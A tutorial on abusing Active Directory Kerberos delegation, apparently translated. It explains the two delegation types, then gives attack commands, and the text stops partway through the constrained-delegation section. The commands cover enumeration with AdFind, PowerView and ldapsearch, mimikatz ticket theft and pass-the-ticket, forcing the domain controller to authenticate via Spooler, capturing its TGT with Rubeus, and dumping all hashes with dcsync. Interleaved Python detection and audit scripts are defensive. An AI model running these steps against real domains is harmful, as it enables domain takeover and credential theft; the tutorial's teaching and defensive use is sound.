
Attacks based on domain delegation

1 Definitions related to domain delegation

1.1 Definition

Identity delegation is a feature of Active Directory Federation Services (AD FS) that allows administrator-specified accounts to impersonate users. The account that impersonates the user is called the delegate.

This delegation capability is critical for many distributed applications in which a series of access control checks must be made sequentially for each application, database, or service in the authorization chain of the originating request.

Many real-world scenarios exist in which a Web application "front end" must retrieve data from a more secure "back end", such as a Web service connected to a Microsoft SQL Server database.

Domain delegation is an application model often deployed in large networks. It brings great convenience to multi-hop authentication, but also great security risk: delegation can be abused to obtain domain administrator privileges and even to plant deeply hidden backdoors.

Domain delegation means delegating the permissions of a user in the domain to a service account, so that the service account can act within the domain with that user's rights.

Note: Two kinds of accounts in the domain can be configured for delegation: host accounts (Net Computer), and service accounts (Net User) added manually with setspn. The examples below, whether for unconstrained or constrained delegation, use host accounts, because a delegation environment built on host accounts is easy to set up and easy to understand. From the attacker's point of view, however, service accounts and host accounts are equivalent.

A service account is a type of domain user: the account a server uses to run a service, under which the service runs and joins the domain. For example, when MS SQL Server is installed it automatically registers the service account SqlServiceAccount in the domain. This type of account cannot be used for interactive logon.

After an ordinary domain user jack authenticates to the front-end WEB service via Kerberos, the service account websvc that runs the WEB service impersonates jack and continues to authenticate, again via Kerberos, to the back-end server, thereby obtaining jack's access rights on the back-end server. This is single- or multi-hop Kerberos authentication within the domain.

1.2 Process

1. Domain user jack authenticates with Kerberos to access the web server;

2. The web service runs under the websvc service account, and websvc requests a ticket for user jack from the KDC;

3. The KDC checks the delegation attributes of the websvc account and, if delegation is set, returns a forwardable TGT for user jack;

4. After websvc receives jack's TGT, it uses that ticket to request from the KDC a service ticket (ST) for accessing the file server;

5. The KDC checks the delegation attributes of websvc; if delegation is set and the file service is in the allowed list, it returns an ST authorizing user jack to access the file service;

6. Once websvc holds jack's ST, it can access the file service, completing the multi-hop authentication.

1.3 Delegation types

There are three main forms of delegation within the domain:

First, unconstrained delegation (Unconstrained Delegation): the service account obtains the user's TGT, so it can use that TGT to impersonate the user to any service.

Second, constrained delegation (Constrained Delegation), based on the Kerberos extension S4U2Proxy: the service account can only obtain an ST for a given user, so it can only impersonate the user to specific services.

2 Unconstrained delegation

2.1 Principle

If service account B of service A is configured for unconstrained delegation, then when user C accesses service A through Kerberos authentication, the KDC checks the attributes of service account B. Finding that it is trusted for unconstrained delegation, the KDC places user C's TGT inside the ST. In this way B obtains user C's TGT while validating the ST, and can then impersonate user C to access any service.

After delegation is enabled, the userAccountControl attribute of the account carries an additional flag: TRUSTED_FOR_DELEGATION (0x80000, decimal 524288, which is the value matched by the LDAP queries below).

Configuring unconstrained delegation requires the SeEnableDelegation privilege, which is usually granted only to domain administrators.

2.2 Practice

2.2.1 Finding unconstrained delegation

2.2.1.1 adfind

Query hosts configured for unconstrained delegation:

AdFind.exe -b 'DC=pentest,DC=com' -f '(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))' cn distinguishedName

Query users configured for unconstrained delegation:

AdFind.exe -b 'DC=pentest,DC=com' -f '(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))' cn distinguishedName

2.2.1.2 powerview

Note: PowerSploit dev branch

Query users configured for unconstrained delegation: Get-NetUser -Unconstrained -Domain pentest.com

Query hosts configured for unconstrained delegation: Get-DomainComputer -Unconstrained -Domain pentest.com

2.2.1.3 ldapsearch

Note: Requires the password of any user account in the domain.

Query machines configured for unconstrained delegation:

ldapsearch -LLL -x -H ldap://172.16.147.130:389 -D '[email protected]' -w '123456bY' -b dc=pentest,dc=com '(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))' cn distinguishedName

Query users configured for unconstrained delegation:

ldapsearch -LLL -x -H ldap://172.16.147.130:389 -D '[email protected]' -w '123456' -b dc=pentest,dc=com '(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))' cn distinguishedName

2.2.2 Exploiting unconstrained delegation

2.2.2.1 Impersonated administrator access

Note: Before the experiment it is recommended to purge the tickets in memory; in mimikatz: kerberos::purge

Simulate the administrator accessing the SMB service of the unconstrained-delegation machine: net use \\win7\c$

Go back to the unconstrained-delegation machine and inspect the tickets (partial screenshot):

privilege::debug

sekurlsa::tickets

The TGT was intercepted; we use sekurlsa::tickets /export to export the tickets.

At this point, our access to the domain controller is denied:

Then use kerberos::ptt <ticket file name> in mimikatz to inject the ticket into memory:

Access now succeeds.

If you want to execute commands, you can use the WinRM service to connect remotely to the domain controller:

Enter-PSSession -ComputerName DC

2.2.2.2 Spooler Printer Bug

In practice, simply configuring unconstrained delegation and waiting for an administrator to connect is a waste of time. Combining unconstrained delegation with the Spooler printer service, however, can force a specified host to connect.

Exploitation principle: it abuses an old but default-enabled method of the Windows Print System Remote Protocol (MS-RPRN): any domain user can call the MS-RPRN method RpcRemoteFindFirstPrinterChangeNotification(Ex) to force any computer running the Spooler service to authenticate, via Kerberos or NTLM, to a target chosen by the attacker.

POC: https://github.com/leechristensen/SpoolSample

Send a request to the DC's Spooler service, forcing it to access win7 and authenticate: SpoolSample.exe DC win7

Rubeus can be used to listen for events with Event ID 4624 so that the DC's TGT is intercepted as soon as it arrives. The following monitors for logons from DC$ every second (local administrator privileges are required): Rubeus.exe monitor /interval:1 /filteruser:DC$

Note: the TGT captured by Rubeus.exe is base64 encoded, but it does not need to be decoded; Rubeus can inject a base64-encoded ticket directly into memory: Rubeus.exe ptt /ticket:base64

After the TGT is obtained and injected into the current session with PTT, dcsync can be used to export the hashes of all users from the domain controller, and the krbtgt hash can then be used to forge a golden ticket.

kerberos::ptt xxxx.kirbi

lsadump::dcsync /domain:test.local /all /csv
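The same Event ID 4624 signal that Rubeus watches for above is what a defender should alert on. The script below is an added example, not part of the original post and not Rubeus code: it parses a few constructed Security log lines (field names follow the 4624 event schema: TargetUserName, TargetDomainName, LogonType, IpAddress, plus Computer for the host that recorded the event) and flags machine-account network logons onto hosts known to have unconstrained delegation. The host inventory, account names and IP addresses are constructed to resemble the post's lab and are not real data.

```python
"""Detection for the coercion scenario above: a domain controller's machine
account authenticating to a host that has unconstrained delegation.

Added example; not part of the original post and not Rubeus code. Field names
follow the 4624 event schema; hosts, accounts and IPs are constructed.
"""
from typing import Dict, Iterable, List, Set

# Constructed inventory: in practice this comes from the LDAP queries in 2.2.1.
UNCONSTRAINED_HOSTS: Set[str] = {"win7.pentest.com"}
DOMAIN_CONTROLLER_HOSTS: Set[str] = {"dc.pentest.com", "dc2.pentest.com"}
DOMAIN_CONTROLLER_ACCOUNTS: Set[str] = {"DC$", "DC2$"}

# Constructed sample log lines, one event per line as key=value pairs.
SAMPLE_EVENTS = """\
EventID=4624 TargetUserName=jack TargetDomainName=PENTEST LogonType=3 Computer=win7.pentest.com IpAddress=172.16.147.150
EventID=4624 TargetUserName=DC$ TargetDomainName=PENTEST LogonType=3 Computer=win7.pentest.com IpAddress=172.16.147.130
EventID=4624 TargetUserName=DC$ TargetDomainName=PENTEST LogonType=3 Computer=dc2.pentest.com IpAddress=172.16.147.130
EventID=4624 TargetUserName=FILESRV$ TargetDomainName=PENTEST LogonType=3 Computer=win7.pentest.com IpAddress=172.16.147.140
EventID=4624 TargetUserName=WIN7$ TargetDomainName=PENTEST LogonType=5 Computer=win7.pentest.com IpAddress=-
EventID=4672 TargetUserName=jack TargetDomainName=PENTEST Computer=win7.pentest.com
"""


def parse_event(line: str) -> Dict[str, str]:
    """Split 'k=v k=v ...' into a dict; values in these constructed events never contain spaces."""
    fields: Dict[str, str] = {}
    for token in line.split():
        key, _, value = token.partition("=")
        fields[key] = value
    return fields


def is_machine_account(name: str) -> bool:
    return name.endswith("$")


def detect_delegation_abuse(lines: Iterable[str],
                            unconstrained_hosts: Set[str] = UNCONSTRAINED_HOSTS,
                            dc_accounts: Set[str] = DOMAIN_CONTROLLER_ACCOUNTS) -> List[Dict[str, str]]:
    """Return one alert per machine-account network logon (LogonType 3) onto an
    unconstrained-delegation host. A DC account is rated high: its forwarded TGT
    on that host is exactly what the coercion described above harvests."""
    alerts: List[Dict[str, str]] = []
    for raw in lines:
        if not raw.strip():
            continue
        ev = parse_event(raw)
        if ev.get("EventID") != "4624" or ev.get("LogonType") != "3":
            continue
        user = ev.get("TargetUserName", "")
        host = ev.get("Computer", "")
        if not is_machine_account(user) or host not in unconstrained_hosts:
            continue
        if host in DOMAIN_CONTROLLER_HOSTS:  # DCs are trusted for delegation by design
            continue
        alerts.append({
            "severity": "high" if user in dc_accounts else "medium",
            "account": user,
            "host": host,
            "source_ip": ev.get("IpAddress", ""),
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_delegation_abuse(SAMPLE_EVENTS.splitlines()):
        print(alert)
```

On the constructed sample the DC$ logon to win7 is rated high and the FILESRV$ logon medium; the DC$ logon to dc2 is ignored because DCs are expected to be trusted for delegation, and the LogonType 5 service logon is not a network logon at all.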

3 Constrained delegation

3.1 Principle

Because of the insecurity of unconstrained delegation, Microsoft introduced constrained delegation in Windows Server 2003. It extends the Kerberos protocol with S4U, which has two sub-protocols: Service for User to Self (S4U2Self) and Service for User to Proxy (S4U2proxy). Both allow a service to request tickets from the KDC on behalf of a user. S4U2self lets a service request a Kerberos service ticket (ST) to itself; S4U2proxy lets it request an ST for another service in the user's name, and constrained delegation limits the scope of the S4U2proxy extension.

Request flow for S4U2Self and S4U2proxy (figure from the Microsoft documentation):

Steps 1-4 represent the S4U2Self request, and steps 5-10 represent the S4U2proxy request.

1. The user makes a request to service1. The user is authenticated, but service1 has no authorization data for the user. Typically this is because authentication was done by some means other than Kerberos.

2. service1 requests from the KDC, in the user's name, an ST1 for accessing service1, through the S4U2self extension.

3. The KDC returns to service1 an ST1 that authenticates the user to service1 and may contain the user's authorization data.

4. service1 can use the authorization data in the ST to satisfy the user's request and then responds to the user.

Note: Although S4U2self gives service1 information about the user, S4U2self does not allow service1 to make requests to other services on behalf of the user. This is where S4U2proxy comes into play.

5. The user makes a request to service1, which needs to access resources on service2 as the user.

6. service1 requests from the KDC, in the user's name, an ST2 for the user to access service2.

7. If the request contains a PAC, the KDC validates the PAC by checking its signature data. If the PAC is valid or absent, the KDC returns ST2 to service1, but the client identity stored in the cname and crealm fields of ST2 is the user's identity, not service1's.

8. service1 uses ST2 to send a request to service2 in the user's name; service2 verifies that the user has been authenticated by the KDC.

9. service2 responds to the request from step 8.

10. service1 responds to the user's request from step 5.
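To make the difference between the two delegation modes concrete, here is an added toy model of the KDC's decisions, covering both the flow in 1.2 and the S4U2proxy steps above. It is not code from the original post and not real Kerberos: tickets are plain Python objects with no cryptography, S4U2self is not modelled, and the names (Kdc, ServiceAccount, access_through_service) and the lab accounts are invented for illustration. It encodes the two rules the text describes: an unconstrained service receives the user's forwardable TGT inside the ST and can then obtain an ST for any service, while a constrained service only obtains an ST via S4U2proxy and only for SPNs listed in msDS-AllowedToDelegateTo.

```python
"""Toy model of the KDC delegation rules from sections 1.2 and 3.1.

Added example, not code from the original post and not real Kerberos: tickets
are dataclasses without cryptography, and the names (Kdc, ServiceAccount,
access_through_service, ...) are invented for illustration. S4U2self is not modelled.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional


@dataclass
class Tgt:
    client: str               # the user the TGT was issued to
    forwardable: bool = True


@dataclass
class ServiceTicket:
    client: str               # cname/crealm: always the user, never the requesting service
    spn: str
    forwarded_tgt: Optional[Tgt] = None   # set only when the target service is unconstrained


@dataclass
class ServiceAccount:
    name: str
    spn: str
    unconstrained: bool = False                                      # TRUSTED_FOR_DELEGATION
    allowed_to_delegate_to: List[str] = field(default_factory=list)  # msDS-AllowedToDelegateTo


class Kdc:
    def __init__(self, accounts: List[ServiceAccount]) -> None:
        self.accounts: Dict[str, ServiceAccount] = {a.spn: a for a in accounts}

    def issue_tgt(self, user: str) -> Tgt:
        return Tgt(client=user)

    def issue_st(self, tgt: Tgt, spn: str) -> ServiceTicket:
        """TGS-REQ with a TGT. For an unconstrained service the KDC embeds the
        user's forwardable TGT in the ST (section 2.1); that embedding is the risk."""
        target = self.accounts[spn]
        forwarded = tgt if (target.unconstrained and tgt.forwardable) else None
        return ServiceTicket(client=tgt.client, spn=spn, forwarded_tgt=forwarded)

    def s4u2proxy(self, requester: ServiceAccount, evidence: ServiceTicket,
                  target_spn: str) -> ServiceTicket:
        """Steps 6-7: the service presents the user's ST to itself as evidence and
        asks for an ST to target_spn in the user's name. Constrained delegation
        limits this to SPNs listed in the requester's msDS-AllowedToDelegateTo."""
        if evidence.spn != requester.spn:
            raise PermissionError("evidence ticket is not for the requesting service")
        if target_spn not in requester.allowed_to_delegate_to:
            raise PermissionError(f"{requester.name} may not delegate to {target_spn}")
        return ServiceTicket(client=evidence.client, spn=target_spn)


def access_through_service(kdc: Kdc, user: str, front_spn: str, back_spn: str) -> str:
    """User -> front-end service -> back-end service. Returns how the second hop
    was authorised: 'forwarded-tgt' (unconstrained), 's4u2proxy' (constrained,
    target in the allowed list) or 'denied'."""
    tgt = kdc.issue_tgt(user)
    st1 = kdc.issue_st(tgt, front_spn)           # steps 1-3 of the 1.2 flow
    front = kdc.accounts[front_spn]
    if st1.forwarded_tgt is not None:
        # Unconstrained: the service now holds the user's TGT and can request an
        # ST for any service, including the domain controller.
        st2 = kdc.issue_st(st1.forwarded_tgt, back_spn)
        return "forwarded-tgt" if st2.client == user else "denied"
    try:
        kdc.s4u2proxy(front, st1, back_spn)
    except PermissionError:
        return "denied"
    return "s4u2proxy"


# Constructed accounts in the spirit of the post's lab (not its real configuration).
LAB_ACCOUNTS = [
    ServiceAccount("WIN7$", "HOST/win7.pentest.com", unconstrained=True),
    ServiceAccount("websvc", "HTTP/web.pentest.com",
                   allowed_to_delegate_to=["cifs/fileserver.pentest.com"]),
    ServiceAccount("FILESRV$", "cifs/fileserver.pentest.com"),
    ServiceAccount("DC$", "ldap/dc.pentest.com"),
]
LAB_KDC = Kdc(LAB_ACCOUNTS)

if __name__ == "__main__":
    print(access_through_service(LAB_KDC, "jack", "HOST/win7.pentest.com", "ldap/dc.pentest.com"))
    print(access_through_service(LAB_KDC, "jack", "HTTP/web.pentest.com", "cifs/fileserver.pentest.com"))
    print(access_through_service(LAB_KDC, "jack", "HTTP/web.pentest.com", "ldap/dc.pentest.com"))
```

With these accounts, jack reaching the DC through the unconstrained win7 host succeeds via the forwarded TGT, websvc reaching the file server succeeds via S4U2proxy because that SPN is in its list, and websvc reaching the DC is denied: the allowed-to-delegate-to list is the only thing standing between the front-end service and any other service in the domain.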

When constrained delegation is configured, the account's userAccountControl attribute contains TRUSTED_TO_AUTH_FOR_DELEGATION (T2A4D), and its msDS-AllowedToDelegateTo attribute lists the services it is allowed to delegate to.

From this we can see that constrained delegation does not require any other user to actively make a request in order to impersonate them. Once you control an account configured for constrained delegation, you gain access to the hosts that delegation is configured for.

3.2 Practice

3.2.1 Finding constrained delegation

3.2.1.1 adfind

Query hosts configured for constrained delegation:

AdFind.exe -b 'DC=pentest,DC=com' -f '(&(samAccountType=805306369)(msds-allowedtodelegateto=*))' cn distinguishedName msds-allowedtodelegateto

Query users configured for constrained delegation:

AdFind.exe -b 'DC=pentest,DC=com' -f '(&(samAccountType=805306368)(msds-allowedtodelegateto=*))' cn distinguishedName msds-allowedtodelegateto

3.2.1.2 powerview

Query hosts configured for constrained delegation:

Get-DomainComputer -TrustedToAuth -Domain test.com -Properties distinguishedname,useraccountcontrol,msds-allowedtodelegateto

Query users configured for constrained delegation:

Get-DomainUser -TrustedToAuth -Domain qiyou.com -Properties distinguishedname,useraccountcontrol,msds-allowedtodelegateto | fl

3.2.1.3 ldapsearch

Query machines configured for constrained delegation:

ldapsearch -LLL -x -H ldap://IP:389 -D '[email protected]' -w '123456' -b dc=pentest,dc=com '(&(samAccountType=805306369)(msds-allowedtodelegateto=*))' cn distinguishedName msds-allowedtodelegateto

Query users configured for constrained delegation:

ldapsearch -LLL -x -H ldap://IP:389 -D '[email protected]' -w '123456' -b dc=pentest,dc=com '(&(samAccountType=805306368)(msds-allowedtodelegateto=*))' cn distinguishedName msds-allowedtodelegateto
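The AdFind and ldapsearch filters in 2.2.1 and 3.2.1 are also what an auditor runs to find delegation that should not be there. The following added example (not code from the original post) re-implements the semantics of those filters in Python so the same classification can be run offline over a directory export: the samAccountType values 805306368 and 805306369, the LDAP bitwise-AND matching rule 1.2.840.113556.1.4.803 against userAccountControl, and the presence of msDS-AllowedToDelegateTo. It goes slightly beyond the page by separating Kerberos-only constrained delegation from the protocol-transition variant (the T2A4D flag is only set when "use any authentication protocol" is selected) and by marking domain controllers, which are trusted for delegation by default, as expected rather than as findings. The DirectoryObject type, the function names and the sample records are constructed.

```python
"""Delegation audit over exported directory records.

Added example, not code from the original post. It re-implements the semantics
of the AdFind/ldapsearch filters in 2.2.1 and 3.2.1. All records are constructed.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional

SAM_USER_OBJECT = 805306368                     # samAccountType: user account
SAM_MACHINE_ACCOUNT = 805306369                 # samAccountType: computer account
UAC_TRUSTED_FOR_DELEGATION = 0x80000            # 524288: unconstrained delegation
UAC_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # 16777216: T2A4D, protocol transition
DOMAIN_CONTROLLERS_PRIMARY_GROUP = 516          # primaryGroupID of DC computer accounts


@dataclass
class DirectoryObject:
    cn: str
    distinguished_name: str
    sam_account_type: int
    user_account_control: int
    allowed_to_delegate_to: List[str] = field(default_factory=list)  # msDS-AllowedToDelegateTo
    primary_group_id: int = 0   # 0 = attribute not exported


def bitwise_and_match(value: int, mask: int) -> bool:
    """LDAP_MATCHING_RULE_BIT_AND (1.2.840.113556.1.4.803): every bit of the
    mask must be set in the attribute value."""
    return value & mask == mask


def find_unconstrained(objects: List[DirectoryObject], sam_type: int) -> List[str]:
    """(&(samAccountType=<sam_type>)(userAccountControl:1.2.840.113556.1.4.803:=524288))"""
    return [o.cn for o in objects
            if o.sam_account_type == sam_type
            and bitwise_and_match(o.user_account_control, UAC_TRUSTED_FOR_DELEGATION)]


def find_constrained(objects: List[DirectoryObject], sam_type: int) -> List[str]:
    """(&(samAccountType=<sam_type>)(msds-allowedtodelegateto=*))"""
    return [o.cn for o in objects
            if o.sam_account_type == sam_type and o.allowed_to_delegate_to]


def classify(obj: DirectoryObject) -> Optional[str]:
    if bitwise_and_match(obj.user_account_control, UAC_TRUSTED_FOR_DELEGATION):
        return "unconstrained"
    if obj.allowed_to_delegate_to:
        # T2A4D is only set when "use any authentication protocol" is chosen;
        # Kerberos-only constrained delegation has just the target list.
        if bitwise_and_match(obj.user_account_control, UAC_TRUSTED_TO_AUTH_FOR_DELEGATION):
            return "constrained-protocol-transition"
        return "constrained"
    return None


def audit(objects: List[DirectoryObject]) -> List[Dict[str, str]]:
    """One finding per delegating object, with a note on why it matters."""
    findings: List[Dict[str, str]] = []
    for o in objects:
        kind = classify(o)
        if kind is None:
            continue
        if kind == "unconstrained" and o.primary_group_id == DOMAIN_CONTROLLERS_PRIMARY_GROUP:
            note = "expected: domain controllers are trusted for delegation by default"
        elif kind == "unconstrained":
            note = "review: a non-DC that receives the forwarded TGT of everyone who connects"
        else:
            note = "review targets: " + ", ".join(o.allowed_to_delegate_to)
        findings.append({"cn": o.cn, "type": kind, "note": note})
    return findings


# Constructed records, not real directory data. 0x1000 = WORKSTATION_TRUST_ACCOUNT,
# 0x2000 = SERVER_TRUST_ACCOUNT, 0x200 = NORMAL_ACCOUNT.
SAMPLE_DIRECTORY = [
    DirectoryObject("DC", "CN=DC,OU=Domain Controllers,DC=pentest,DC=com", SAM_MACHINE_ACCOUNT,
                    0x2000 | UAC_TRUSTED_FOR_DELEGATION, primary_group_id=516),
    DirectoryObject("WIN7", "CN=WIN7,CN=Computers,DC=pentest,DC=com", SAM_MACHINE_ACCOUNT,
                    0x1000 | UAC_TRUSTED_FOR_DELEGATION, primary_group_id=515),
    DirectoryObject("websvc", "CN=websvc,CN=Users,DC=pentest,DC=com", SAM_USER_OBJECT,
                    0x200 | UAC_TRUSTED_TO_AUTH_FOR_DELEGATION, ["cifs/fileserver.pentest.com"]),
    DirectoryObject("sqlsvc", "CN=sqlsvc,CN=Users,DC=pentest,DC=com", SAM_USER_OBJECT,
                    0x200, ["MSSQLSvc/db.pentest.com:1433"]),
    DirectoryObject("jack", "CN=jack,CN=Users,DC=pentest,DC=com", SAM_USER_OBJECT, 0x200),
]

if __name__ == "__main__":
    for finding in audit(SAMPLE_DIRECTORY):
        print(finding)
```

On the constructed export the only unconstrained finding that needs review is WIN7 (the DC is expected), while websvc and sqlsvc are listed with the SPNs they may delegate to so that each target can be checked against what the service actually needs.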

3.2.2 Exploiting constrained delegation

3.2.2.1 Common case

As described, with constrained delegation the service account can only obtain an ST for a given user or host, can only use the impersonated user to access specific services, and cannot obtain the user's TGT. If the plaintext password or hash of an account configured for constrained delegation can be obtained, the S4U request can be forged, and the service account can then be impersonated to obtain an ST to the target service with the rights of any account.

First dump the host account's NTLM hash: mimikatz.exe 'privilege::debug' 'sek
